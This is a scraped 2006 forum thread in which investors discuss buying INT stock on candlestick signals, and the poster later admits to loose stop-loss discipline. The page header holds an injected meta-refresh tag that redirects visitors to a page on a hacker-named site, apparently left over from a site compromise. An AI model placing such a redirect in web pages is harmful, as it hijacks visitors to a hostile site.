Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - INT
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

INT

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
mjlewis

PostPosted: Fri Sep 01, 2006 9:31 am    Post subject: INT Reply with quote

I'm interested in any feedback on INT. It appears to have bottomed with a number of hammers, and a good move up yesterday with higher-than-average volume. MACD and STO all look good to me. It formed a morning star like pattern yesterday.

Any thoughts?
Harry

PostPosted: Fri Sep 01, 2006 7:25 pm    Post subject: Reply with quote

I don't see a big move in this any time soon, but the odds are in your favor for a couple of bucks the next week or so. The 39 area would be a 5 to 6 percent move. This information and a dollar will buy you a cup of coffee. Wink
rm

PostPosted: Fri Sep 01, 2006 8:05 pm    Post subject: Reply with quote

I like this one alot, if I had some money ready I'd get in myself.

I agree with Harry, it may be good for just a couple of bucks for now, but if it can keep going through some minor resistances it can bring more.

I remember buying some of this one over a year ago when I was looking at IBD.

If it gaps open I would get in then, if not I'd watch for awhile and see which way it goes.

Hand me that cream and sugar would ya Very Happy

rm
Scooter

PostPosted: Sat Sep 02, 2006 12:11 am    Post subject: Reply with quote

Agree with all the above comments. Great looking chart. Can easily see it making a few quick bucks.

Scooter
mjlewis

PostPosted: Sat Sep 02, 2006 9:52 pm    Post subject: Reply with quote

Exactly what I was hoping for. I'm definitely glad to see some agreement. Most of my recent gains have just been 3-5 day holds.

Thanks for the feedback.
mjlewis

PostPosted: Mon Sep 18, 2006 3:50 pm    Post subject: Reply with quote

I'm not sure if I should admit this, but I'm still holding INT. It had a very short (2) day runup after the signal on 8/31, and then retraced all the way back down to the 34.50-35 range. I probably should have sold it when it gapped down on 9/11 and then traded down below 34, but I held it. I felt this showed continued strength in the 34.50-35 support zone. I should have sold it when it gapped down on 9/12 below 34.50, but it quickly moved back over 34.50 and closed with a very strong candle. It's had a nice run up since then, and I'm up around 10%.

This one worked out well, but I definitely need to work on enforcing my stop losses more rigidly. I keep finding reasons to hold a position rather than get out.
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: